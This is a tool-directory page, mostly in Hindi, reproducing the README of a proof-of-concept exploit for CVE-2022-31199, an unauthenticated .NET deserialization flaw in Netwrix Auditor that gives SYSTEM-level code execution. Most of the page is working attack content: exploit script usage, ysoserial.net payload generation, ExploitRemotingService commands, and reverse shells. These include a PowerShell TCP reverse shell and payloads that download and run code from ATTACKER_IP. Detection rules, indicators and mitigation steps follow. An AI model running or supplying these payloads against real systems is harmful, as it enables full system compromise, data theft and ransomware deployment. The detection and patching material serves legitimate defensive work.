Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-31199 — # CVE-2022-31199 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट Netwrix Auditor में एक गंभीर .NET डिसीरियलाइज़ेशन RCE भेद्यता। इसमें Python और PowerShell स्क्रिप्ट, ysoserial.net के साथ पेलोड जनरेशन, और अधिकृत सुरक्षा परीक्षण के लिए डिटेक्शन सिग्नेचर शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/developerfred/cve-2022-31199
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारेड टीमिंगपेलोड डेवलपमेंटलैब और अभ्यास
GitHub
developerfred/cve-2022-31199

CVE-2022-31199

# CVE-2022-31199 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट Netwrix Auditor में एक गंभीर .NET डिसीरियलाइज़ेशन RCE भेद्यता। इसमें Python और PowerShell स्क्रिप्ट, ysoserial.net के साथ पेलोड जनरेशन, और अधिकृत सुरक्षा परीक्षण के लिए डिटेक्शन सिग्नेचर शामिल हैं।

रिपॉजिटरी देखें
39 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-31199 - Netwrix Auditor RCE शोषण POCs

🔍 भेद्यता अवलोकन

CVE-2022-31199 Netwrix Auditor के 10.5 से पहले के संस्करणों में एक गंभीर असुरक्षित ऑब्जेक्ट डी-सीरियलाइज़ेशन भेद्यता है। यह भेद्यता TCP पोर्ट 9004 पर सुनने वाली एक असुरक्षित .NET Remoting सेवा में मौजूद है, जो अनप्रमाणित दूरस्थ हमलावरों को NT AUTHORITY\SYSTEM विशेषाधिकारों के साथ मनमाना कोड निष्पादन प्राप्त करने की अनुमति देती है।

भेद्यता विवरण

  • CVE आईडी: CVE-2022-31199
  • CVSS स्कोर: 9.8 (गंभीर)
  • CWE: CWE-502 (अविश्वसनीय डेटा का डी-सीरियलाइज़ेशन)
  • प्रभावित संस्करण: Netwrix Auditor < 10.5
  • आक्रमण वेक्टर: नेटवर्क (अनप्रमाणित)
  • आवश्यक विशेषाधिकार: कोई नहीं
  • प्रभाव: SYSTEM विशेषाधिकारों के साथ पूर्ण सिस्टम से समझौता
  • CISA KEV: ज्ञात शोषित भेद्यता सूची (Known Exploited Vulnerabilities Catalog) में सूचीबद्ध

वास्तविक-विश्व प्रभाव

यह भेद्यता वास्तविक दुनिया में सक्रिय रूप से शोषित की जा चुकी है:

  • Truebot मैलवेयर अभियान (रूस-संबद्ध CL0P/TA505 रैनसमवेयर ऑपरेटर)
  • Silence साइबर अपराधी समूह
  • FIN11 खतरा अभिनेता

सफल शोषण आमतौर पर निम्न की ओर ले जाता है:

  • पूर्ण Active Directory डोमेन समझौता
  • निगरानी प्रणालियों में पार्श्व संचलन (lateral movement)
  • डेटा बहिर्गमन (exfiltration)
  • रैनसमवेयर परिनियोजन
  • 📦 रिपॉजिटरी सामग्री

    इस रिपॉजिटरी में CVE-2022-31199 के लिए पूर्ण प्रूफ-ऑफ-कॉन्सेप्ट (POC) शोषण शामिल हैं:

    फ़ाइलें

    1. exploit.py - Python-आधारित शोषण फ्रेमवर्क
    2. exploit.ps1 - PowerShell शोषण स्क्रिप्ट
    3. README.md - यह दस्तावेज़
    4. manual-exploitation.md - चरण-दर-चरण मैनुअल शोषण गाइड

    🛠️ आवश्यकताएँ

    आवश्यक उपकरण

    Windows-आधारित शोषण (अनुशंसित)

    • ysoserial.net - .NET डी-सीरियलाइज़ेशन पेलोड जनरेटर

      • डाउनलोड: https://github.com/pwntester/ysoserial.net
      • रिलीज़: https://github.com/pwntester/ysoserial.net/releases
    • ExploitRemotingService - .NET Remoting शोषण उपकरण

      • डाउनलोड: https://github.com/tyranid/ExploitRemotingService
      • वैकल्पिक (उन्नत): https://github.com/codewhitesec/ExploitRemotingService

    Python स्क्रिप्ट आवश्यकताएँ

    • Python 3.6 या उच्चतर
    • केवल मानक लाइब्रेरी (बुनियादी जाँच के लिए कोई बाहरी निर्भरता नहीं)
    • ysoserial.net और ExploitRemotingService निष्पादनयोग्य फ़ाइलों तक पहुँच

    PowerShell स्क्रिप्ट आवश्यकताएँ

    • PowerShell 5.1 या उच्चतर
    • Windows ऑपरेटिंग सिस्टम
    • स्क्रिप्ट निर्देशिका में ysoserial.exe और ExploitRemotingService.exe

    🚀 त्वरित आरंभ

    1. जाँचें कि क्या लक्ष्य भेद्य है

    Python का उपयोग करके:

    root@kitploit:~
    python3 exploit.py --target 192.168.1.100 --check
    

    PowerShell का उपयोग करके:

    root@kitploit:~
    .\exploit.ps1 -Target 192.168.1.100 -CheckOnly
    

    2. पेलोड जनरेट करें

    root@kitploit:~
    # Using ysoserial.net
    ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "whoami"
    

    3. शोषण निष्पादित करें

    Python (पूर्व-जनरेट किए गए पेलोड के साथ):

    root@kitploit:~
    python3 exploit.py --target 192.168.1.100 --payload [BASE64_PAYLOAD]
    

    PowerShell (स्वचालित):

    root@kitploit:~
    .\exploit.ps1 -Target 192.168.1.100 -Command "whoami"
    

    📖 विस्तृत उपयोग

    Python शोषण (exploit.py)

    बुनियादी भेद्यता जाँच

    root@kitploit:~
    python3 exploit.py --target 10.10.10.100 --check
    

    कस्टम पेलोड के साथ संपूर्ण शोषण

    root@kitploit:~
    # Step 1: Generate payload
    ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "cmd /c whoami > C:\temp\output.txt"
    
    # Step 2: Execute exploit
    python3 exploit.py --target 10.10.10.100 --payload AAEAAAD....[base64_payload]
    

    उन्नत विकल्प

    root@kitploit:~
    # Custom port
    python3 exploit.py --target 10.10.10.100 --port 9004 --check
    
    # Custom endpoint
    python3 exploit.py --target 10.10.10.100 --endpoint UAVRServer --check
    

    कमांड लाइन तर्क

    root@kitploit:~
    --target    : Target IP address or hostname (required)
    --port      : Target port (default: 9004)
    --endpoint  : .NET Remoting endpoint name (default: UAVRServer)
    --check     : Only check vulnerability, don't exploit
    --payload   : Base64 encoded payload from ysoserial.net
    

    PowerShell शोषण (exploit.ps1)

    केवल भेद्यता जाँच

    root@kitploit:~
    .\exploit.ps1 -Target 192.168.1.100 -CheckOnly
    

    कमांड निष्पादित करें

    root@kitploit:~
    # Simple command execution
    .\exploit.ps1 -Target 192.168.1.100 -Command "whoami"
    
    # Write output to file
    .\exploit.ps1 -Target 192.168.1.100 -Command "cmd /c whoami > C:\temp\out.txt"
    
    # Custom port
    .\exploit.ps1 -Target 192.168.1.100 -Port 9004 -Command "hostname"
    

    पैरामीटर

    root@kitploit:~
    -Target     : Target IP address or hostname (required)
    -Port       : Target port (default: 9004)
    -Command    : Command to execute on target (default: "whoami")
    -CheckOnly  : Only check vulnerability, don't exploit
    

    🎯 शोषण उदाहरण

    उदाहरण 1: सूचना एकत्र करना

    root@kitploit:~
    # Check system information
    ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "cmd /c systeminfo > C:\temp\sysinfo.txt"
    

    उदाहरण 2: रिवर्स शेल

    लिसनर सेटअप करें:

    root@kitploit:~
    nc -lvnp 4444
    

    पेलोड जनरेट करें:

    root@kitploit:~
    ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell -c curl http://ATTACKER_IP/nc.exe -o C:\temp\nc.exe; C:\temp\nc.exe ATTACKER_IP 4444 -e cmd.exe"
    

    उदाहरण 3: PowerShell रिवर्स शेल

    रिवर्स शेल स्क्रिप्ट बनाएँ (rev.ps1):

    root@kitploit:~
    $client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);
    $stream = $client.GetStream();
    [byte[]]$bytes = 0..65535|%{0};
    while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
        $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
        $sendback = (iex $data 2>&1 | Out-String );
        $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
        $stream.Write($sendbyte,0,$sendbyte.Length);
        $stream.Flush()
    };
    $client.Close()
    

    स्क्रिप्ट होस्ट करें:

    root@kitploit:~
    python3 -m http.server 8000
    

    पेलोड जनरेट करें:

    root@kitploit:~
    ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP:8000/rev.ps1')"
    

    उदाहरण 4: ExploitRemotingService का सीधे उपयोग करना

    root@kitploit:~
    # Test connectivity
    ExploitRemotingService.exe tcp://192.168.1.100:9004/UAVRServer ver
    
    # Execute with lease mode (bypasses some protections)
    ExploitRemotingService.exe -uselease tcp://192.168.1.100:9004/UAVRServer ls C:\
    
    # Execute with object reference
    ExploitRemotingService.exe -useobjref tcp://192.168.1.100:9004/UAVRServer exec "whoami"
    

    🔬 तकनीकी विवरण

    भेद्यता का मूल कारण

    यह भेद्यता निम्न से उत्पन्न होती है:

    1. TCP पोर्ट 9004 पर असुरक्षित .NET Remoting एंडपॉइंट
    2. उचित प्रकार फ़िल्टरिंग के बिना BinaryFormatter डी-सीरियलाइज़ेशन
    3. UAVRServer सेवा द्वारा मनमाने क्रमबद्ध ऑब्जेक्ट स्वीकार करना
    4. सामान्य परिनियोजन में SYSTEM विशेषाधिकारों के साथ चलने वाली सेवा

    शोषण प्रक्रिया

    root@kitploit:~
    1. Attacker connects to TCP port 9004
    2. Identifies .NET Remoting service (UAVRServer endpoint)
    3. Generates malicious serialized payload using ysoserial.net
    4. Sends payload via .NET Remoting protocol
    5. Target deserializes object using BinaryFormatter
    6. Gadget chain executes arbitrary code
    7. Code runs with NT AUTHORITY\SYSTEM privileges
    

    समर्थित गैजेट चेन

    निम्नलिखित ysoserial.net गैजेट इस भेद्यता के विरुद्ध काम करते हैं:

    • TypeConfuseDelegate (अनुशंसित)
    • ObjectDataProvider
    • PSObject
    • WindowsIdentity
    • TextFormattingRunProperties

    नेटवर्क प्रोटोकॉल

    root@kitploit:~
    .NET Remoting Protocol Structure:
    ┌─────────────────────────────────────┐
    │ Preamble (8 bytes)                  │
    │ 0x00 0x01 0x00 0x00 0x01 0x00 0x00 │
    ├─────────────────────────────────────┤
    │ Headers                             │
    ├─────────────────────────────────────┤
    │ URI (UAVRServer)                    │
    ├─────────────────────────────────────┤
    │ Serialized Object (BinaryFormatter) │
    └─────────────────────────────────────┘
    

    🛡️ पहचान

    नेटवर्क संकेतक

    Snort/Suricata नियम

    root@kitploit:~
    alert tcp any any -> any 9004 (
        msg:"CVE-2022-31199 Netwrix .NET Remoting Exploit Attempt"; 
        content:"|00 01 00 00 01 00 00 00|"; 
        depth:8; 
        content:"System.Runtime.Remoting"; 
        distance:0; 
        sid:1000001; 
        rev:1;
    )
    

    समझौते के संकेतक (IOCs)

    • TCP पोर्ट 9004 पर अप्रत्याशित कनेक्शन
    • .NET Remoting हेडर वाले बड़े पैकेट
    • BinaryFormatter क्रमबद्धता हस्ताक्षर
    • UAVRServer.exe संदर्भ से प्रक्रिया निष्पादन

    होस्ट-आधारित पहचान

    भेद्य सेवा की जाँच करें:

    root@kitploit:~
    # Check if port 9004 is listening
    netstat -ano | findstr :9004
    
    # Identify process
    tasklist /FI "PID eq [PID]"
    

    इवेंट लॉग निगरानी:

    • UAVRServer.exe से असामान्य प्रक्रिया निर्माण देखें
    • SYSTEM-स्तरीय कमांड निष्पादन की निगरानी करें
    • ऑडिट सेवा से नेटवर्क कनेक्शन जाँचें

    YARA नियम

    root@kitploit:~
    rule CVE_2022_31199_Netwrix_Exploit {
        meta:
            description = "Detects CVE-2022-31199 exploitation attempt"
            author = "Security Researcher"
            date = "2024-11-17"
            severity = "critical"
            
        strings:
            $header = { 00 01 00 00 01 00 00 00 }
            $remoting1 = "System.Runtime.Remoting" ascii
            $remoting2 = "UAVRServer" ascii
            $remoting3 = "Netwrix" ascii
            $serialize = "BinaryFormatter" ascii
            $gadget1 = "TypeConfuseDelegate" ascii
            $gadget2 = "ObjectDataProvider" ascii
            
        condition:
            $header at 0 and 
            ($remoting1 or $remoting2 or $remoting3) and 
            $serialize and
            any of ($gadget*)
    }
    

    🔒 शमन

    तत्काल कार्रवाई

    1. Netwrix Auditor 10.5 या बाद के संस्करण में अपडेट करें

      • संस्करण 10.5.10936.0 (6 जून, 2022) - प्रारंभिक सुधार
      • संस्करण 10.5.10977.0 (27 अक्टूबर, 2022) - अतिरिक्त सुरक्षा
    2. नेटवर्क विभाजन

      • TCP पोर्ट 9004 को अविश्वसनीय नेटवर्क पर एक्सपोज़ न करें
      • Netwrix Auditor को फ़ायरवॉल के पीछे रखें
      • नेटवर्क एक्सेस नियंत्रण लागू करें
    3. निगरानी

      • पोर्ट 9004 पर असामान्य कनेक्शन की निगरानी करें
      • UAVRServer.exe से प्रक्रिया निष्पादन पर अलर्ट करें
      • SYSTEM-स्तरीय कमांड निष्पादन पर नज़र रखें

    सत्यापन

    root@kitploit:~
    # Check Netwrix Auditor version
    Get-ItemProperty "HKLM:\Software\Netwrix\Auditor" | Select Version
    
    # Check if port is exposed
    Test-NetConnection -ComputerName localhost -Port 9004
    
    # Verify firewall rules
    Get-NetFirewallRule | Where-Object {$_.DisplayName -like "*Netwrix*"}
    

    📚 संदर्भ

    आधिकारिक सलाह

    • Bishop Fox सलाह: https://bishopfox.com/blog/netwrix-auditor-advisory
    • NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-31199
    • CISA KEV: https://www.cisa.gov/known-exploited-vulnerabilities-catalog
    • Netwrix कथन: https://www.netwrix.com/netwrix_statement_on_cve202231199.html

    तकनीकी संसाधन

    • ysoserial.net: https://github.com/pwntester/ysoserial.net
    • ExploitRemotingService: https://github.com/tyranid/ExploitRemotingService
    • Code White Research: https://code-white.com/blog/teaching-the-old-net-remoting-new-exploitation-tricks/
    • NCC Group: https://www.nccgroup.com/us/research-blog/finding-and-exploiting-net-remoting-over-http-using-deserialisation/

    खतरा खुफिया

    • Arctic Wolf विश्लेषण: https://arcticwolf.com/resources/blog/cve-2022-31199/
    • NopSec बुलेटिन: https://www.nopsec.com/resources/just-in-time/just-in-time-bulletin-cve-2022-31199-netwrix-insecure-object-deserialization-rce/

    ⚠️ कानूनी अस्वीकरण

    root@kitploit:~
    IMPORTANT: These Proof of Concept (POC) exploits are provided for:
    - Educational purposes
    - Authorized security testing
    - Vulnerability research
    - Defensive security operations
    
    UNAUTHORIZED ACCESS TO COMPUTER SYSTEMS IS ILLEGAL.
    
    By using these tools, you agree to:
    1. Only test systems you own or have explicit written permission to test
    2. Comply with all applicable local, state, and federal laws
    3. Use the tools responsibly and ethically
    4. Not use for malicious purposes
    
    The author(s) assume no liability for misuse of these tools.
    Use at your own risk.
    

    🤝 योगदान

    कोई समस्या या सुधार मिला? बेझिझक:

    • संबंधित रिपॉजिटरी पर एक issue खोलें
    • सुधार या अतिरिक्त तकनीकें सबमिट करें
    • पहचान हस्ताक्षर साझा करें

    📝 श्रेय

    • Bishop Fox - मूल भेद्यता खोज और प्रकटीकरण
    • James Forshaw - ExploitRemotingService फ्रेमवर्क
    • Alvaro Munoz - ysoserial.net विकास
    • ProjectDiscovery - Nuclei टेम्पलेट फ्रेमवर्क

    📅 समयरेखा

    • 6 जून, 2022 - Netwrix सुधार के साथ संस्करण 10.5 जारी करता है
    • जुलाई 2022 - Bishop Fox सलाह प्रकाशित करता है
    • 27 अक्टूबर, 2022 - अतिरिक्त पैच जारी किए गए (संस्करण 10.5.10977.0)
    • मई 2023 - सक्रिय शोषण देखा गया (Truebot अभियान)
    • 11 जुलाई, 2023 - CISA KEV सूची में जोड़ा गया
    • नवंबर 2024 - रक्षात्मक अनुसंधान के लिए POCs जारी किए गए

    संस्करण: 1.0
    अंतिम अद्यतन: 17 नवंबर, 2024
    अनुरक्षक: सुरक्षा अनुसंधान समुदाय

    प्रश्नों या समस्याओं के लिए, कृपया आधिकारिक सलाह और दस्तावेज़ देखें।

    टूल डाउनलोड करें